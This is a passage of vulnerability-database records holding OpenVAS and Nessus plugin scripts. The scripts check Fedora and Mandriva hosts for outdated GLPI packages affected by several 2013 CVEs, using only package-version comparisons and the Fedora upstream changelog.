script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:29", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-08-20T00:00:00", "id": "OPENVAS:1361412562310866607", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866607", 
"type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11315", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11315\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866607\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-08-20 15:18:03 +0530 (Tue, 20 Aug 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11315\");\n\n\n script_tag(name:\"affected\", value:\"glpi on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", 
value:\"2013-11315\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:37:52", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "description": "The remote host is missing an update for the ", "modified": "2019-03-15T00:00:00", "published": "2013-07-05T00:00:00", "id": "OPENVAS:1361412562310866043", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866043", "type": "openvas", "title": "Fedora Update for glpi FEDORA-2013-11413", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for glpi FEDORA-2013-11413\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software 
Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866043\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-07-05 12:56:31 +0530 (Fri, 05 Jul 2013)\");\n script_cve_id(\"CVE-2013-2226\", \"CVE-2013-2225\", \"CVE-2013-2227\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_name(\"Fedora Update for glpi FEDORA-2013-11413\");\n script_xref(name:\"FEDORA\", value:\"2013-11413\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'glpi'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC17\");\n script_tag(name:\"affected\", value:\"glpi on Fedora 17\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", 
value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC17\")\n{\n\n if ((res = isrpmvuln(pkg:\"glpi\", rpm:\"glpi~0.83.9.1~1.fc17\", rls:\"FC17\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "nessus": [{"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. 
Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 18 : glpi-0.83.9.1-1.fc18 (2013-11396)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:18", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11396.NASL", "href": "https://www.tenable.com/plugins/nessus/67307", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11396.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67307);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(60692, 60693, 60823);\n script_xref(name:\"FEDORA\", value:\"2013-11396\");\n\n script_name(english:\"Fedora 18 : glpi-0.83.9.1-1.fc18 (2013-11396)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity 
alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110788.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?28f99aba\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:18\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n 
exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^18([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 18.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC18\", reference:\"glpi-0.83.9.1-1.fc18\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is 
empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 17 : glpi-0.83.9.1-1.fc17 (2013-11413)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:17", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11413.NASL", "href": "https://www.tenable.com/plugins/nessus/67310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11413.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67310);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_xref(name:\"FEDORA\", value:\"2013-11413\");\n\n script_name(english:\"Fedora 17 : glpi-0.83.9.1-1.fc17 (2013-11413)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of 
tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110794.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?439915a2\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_attribute(attribute:\"risk_factor\", value:\"High\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:17\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/21\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n 
script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^17([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 17.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC17\", reference:\"glpi-0.83.9.1-1.fc17\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-12T10:10:51", "description": "Upstream changelog :\n\n - Bug #4306: Notification on delete document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: 
Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 12, "published": "2013-07-12T00:00:00", "title": "Fedora 19 : glpi-0.83.9.1-1.fc19 (2013-11315)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-2227", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-07-12T00:00:00", "cpe": ["cpe:/o:fedoraproject:fedora:19", "p-cpe:/a:fedoraproject:fedora:glpi"], "id": "FEDORA_2013-11315.NASL", "href": "https://www.tenable.com/plugins/nessus/67305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2013-11315.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67305);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_bugtraq_id(60692, 60693, 60823);\n script_xref(name:\"FEDORA\", value:\"2013-11315\");\n\n script_name(english:\"Fedora 19 : glpi-0.83.9.1-1.fc19 (2013-11315)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Upstream changelog :\n\n - Bug #4306: Notification on delete 
document\n\n - Bug #4308: Knowbase : encoding issue to clean search\n\n - Bug #4309: Items disappear when you click in\n tabscrollermenu (vertical list of tabs)\n\n - Bug #4310: Password with < or >\n\n - Bug #4313: Search problem on tab group view in central\n\n - Bug #4329: Task status in notification\n\n - Bug #4332: CronAlertNotClosed : problem of sending\n after X days : date control error\n\n - Bug #4341: Problem user notification edition\n\n - Bug #4348: Recursivity for license in search engine\n\n - Bug #4352: Entity alert bug\n\n - Bug #4355: avoid 'Mailbox is empty' with mail\n collector\n\n - Bug #4367: Cannot use as default view a public\n bookmark\n\n - Bug #4372: CVE-2013-2226 Security : filtering REQUEST\n as POST and GET\n\n - Bug #4375: CVE-2013-2225 + CVE-2013-2227 : Security\n fix ( serialize + filter classname for autoload)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2013-July/110621.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?b74cac6f\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", 
value:\"2013/06/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"glpi-0.83.9.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"glpi\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-01-07T11:54:21", "description": "Updated glpi package fixes security vulnerabilities :\n\nMultiple security vulnerabilities due to improper sanitation of user\ninput in GLPI 
before versions 0.83.9 (CVE-2013-2226), 0.83.91\n(CVE-2013-2225), and 0.84.2 (CVE-2013-5696).\n\nThis update provides GLPI version 0.83.91, with a patch from GLPI\n0.84.2, to fix these issues.", "edition": 24, "published": "2013-09-26T00:00:00", "title": "Mandriva Linux Security Advisory : glpi (MDVSA-2013:240)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-5696", "CVE-2013-2225", "CVE-2013-2226"], "modified": "2013-09-26T00:00:00", "cpe": ["cpe:/o:mandriva:business_server:1", "p-cpe:/a:mandriva:linux:glpi"], "id": "MANDRIVA_MDVSA-2013-240.NASL", "href": "https://www.tenable.com/plugins/nessus/70132", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2013:240. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(70132);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2013-2225\", \"CVE-2013-2226\", \"CVE-2013-5696\");\n script_xref(name:\"MDVSA\", value:\"2013:240\");\n\n script_name(english:\"Mandriva Linux Security Advisory : glpi (MDVSA-2013:240)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated glpi package fixes security vulnerabilities :\n\nMultiple security vulnerabilities due to improper sanitation of user\ninput in GLPI before versions 0.83.9 (CVE-2013-2226), 0.83.91\n(CVE-2013-2225), and 0.84.2 (CVE-2013-5696).\n\nThis update provides GLPI version 0.83.91, with a patch from GLPI\n0.84.2, to fix these issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://advisories.mageia.org/MGASA-2013-0288.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected glpi package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"d2_elliot_name\", value:\"GLPI 0.84.1 RCE\");\n script_set_attribute(attribute:\"exploit_framework_d2_elliot\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'GLPI install.php Remote Command Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:glpi\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/09/26\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n 